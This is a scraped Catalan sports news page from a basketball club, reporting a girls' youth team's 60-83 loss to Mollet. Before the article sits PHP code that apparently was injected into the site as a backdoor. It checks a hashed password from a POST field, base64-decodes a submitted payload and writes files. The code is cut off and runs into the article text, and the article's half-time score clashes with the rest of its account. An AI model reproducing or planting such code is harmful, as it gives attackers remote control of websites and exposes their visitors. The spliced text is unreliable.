function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení A planta cara però no pot amb la superioritat del Mollet (60-83) - Tgn Bàsquet Club -

L’infantil femení A planta cara però no pot amb la superioritat del Mollet (60-83)

Updated: febrer 24, 2014

L’equip infantil femení A del TGN Bàsquet va perdre contra un rival, el Mollet, que va sortir molt fort a la pista. El conjunt visitant va marcar un parcial de 10-25 que decantava la balança al seu favor. Amb tot, el TGN Bàsquet no es va rendir, va millorar molt la defensa i gràcies a un molt bon atac marcat pel tir exterior -les visitants defensaven gairebé sota la cistella- va poder retallar diferències. Així, en quatre minuts (del 16 al 20), el TGN Bàsquet va anotar quatre triples, deixant el resultat en 49-33 al descans. La bona feina va continuar després del descans però la diferència en tirs lliures va ser clau per entendre que les locals no poguessin retallar diferències.